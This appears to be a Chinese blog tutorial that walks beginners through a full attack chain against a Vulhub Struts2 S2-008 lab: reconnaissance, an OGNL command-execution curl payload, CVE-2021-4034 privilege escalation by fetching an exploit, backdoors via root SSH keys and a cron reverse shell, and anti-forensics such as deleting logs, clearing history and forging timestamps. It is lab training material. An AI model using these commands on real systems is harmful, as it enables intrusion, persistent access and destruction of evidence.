【从零开始,学习渗透测试,从安全小白,逐步成长为信息安全领域的信息安全专家】
本文章仅提供学习,切勿将其用于不法手段!
想要从零开始学习信息安全技术,需要的是超越常人的毅力与恒心,水滴石穿,十年磨一剑,没有持久的打磨,没有坚定的意志,是难以成为一名优秀的白帽黑客的!这条成长路,注定充满坎坷,而成功,往往是建立在无数次的失败之后!强者,历经风雨,磨难励心,方可登顶“神级”之境!
第一阶段:搭建训练场(30分钟搞定)
- 安装准备(就像准备施工场地)
# 安装docker和docker-compose
sudo apt-get install docker.io docker-compose
# 下载vulhub剧本(免费漏洞环境集合)
git clone https://github.com/vulhub/vulhub.git
- 启动第一个靶场(像搭积木)
cd vulhub/struts2/s2-008/
docker-compose up -d # 后台启动容器
# 现在你有了一个带漏洞的Struts2系统
哲理点拨:好的工匠不会在客户家里练手,黑客也不该在真实网站练技术。Vulhub就是我们的数字训练场。
第二阶段:信息收集(侦探式侦察)
就像施工前要看图纸,渗透前要摸清目标:
- 端口扫描(查看哪些门开着)
nmap -sS 192.168.1.102 # 发现8080端口开放
- 指纹识别(判断系统类型)
whatweb http://192.168.1.102:8080 # 识别出Struts2框架
实战思考:我常告诉徒弟"不要急着拿钻头,先看清墙体是混凝土还是砖砌的"。
第三阶段:漏洞挖掘与利用(精准打击)
-
查找漏洞库(像查施工规范手册)
- 在ExploitDB搜索Struts2 s2-008
- 确认存在命令执行漏洞
-
发起攻击(精准爆破)
curl http://target:8080/devmode.action --data-urlencode \
'debug=command&expression=#f=#_memberAccess.getClass().getDeclaredField("allowStaticMethodAccess"),#f.setAccessible(1),#f.set(#_memberAccess,1),#a=@java.lang.Runtime@getRuntime().exec("whoami").getInputStream(),#b=new java.io.InputStreamReader(#a),#c=new java.io.BufferedReader(#b),#d=new char[5000],#c.read(#d),#out=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),#out.println(#d),#out.close()'
哲理点拨:这和用冲击钻打孔一个道理——找准薄弱点,用合适的转速和压力。
第四阶段:提权与权限维持(从临时工到管理员)
- 信息收集(在系统内部侦察)
whoami # 查看当前用户
uname -a # 查看系统版本
find / -perm -4000 2>/dev/null # 找SUID程序
- 内核提权(像用液压顶撑开空间)
- 搜索系统版本对应的漏洞
- 使用CVE-2021-4034提权:
wget https://exp.com/poc.c
gcc poc.c -o exp
chmod +x exp
./exp # 获得root权限
- 权限维持(安装后门)
# 添加SSH密钥
echo "ssh-rsa AAAAB3..." >> /root/.ssh/authorized_keys
# 或者创建定时任务
crontab -e
*/10 * * * * /bin/bash -c 'bash -i >& /dev/tcp/192.168.1.100/443 0>&1'
第五阶段:清理痕迹(安全撤离)
就像施工完要清理现场:
- 清除日志
# 清理当前会话日志
echo '' > ~/.bash_history
# 清理系统日志
find /var/log -name "*log*" -exec rm {} \;
- 隐藏文件(隐藏后门文件)
# 设置文件隐藏属性
chattr +i /root/.ssh/authorized_keys
# 修改文件时间戳
touch -r /etc/passwd /root/.ssh/authorized_keys
终极心法:
- 每次测试前备份靶场环境:
docker-compose down && docker-compose up -d - 使用VPN和代理隐藏自己(像戴安全帽)
- 所有操作必须在授权环境下进行
思考:"信息安全技术,就如同工地干活一样!既要敢想敢做,又要恪守道德!Vulhub,给了我们一个不错的训练场所!在模拟的攻防环境中,我们可以充分锻炼自身技能,最终成长为一名优秀的白帽黑客!"
提示:这里,并非速成教程,而是给予想入行信息安全领域的安全爱好者们,一个入门的机会。
(本文所述技术仅限授权环境使用,所有操作需遵守《网络安全法》。Vulhub项目地址:https://github.com/vulhub/vulhub)

4659

被折叠的 条评论
为什么被折叠?



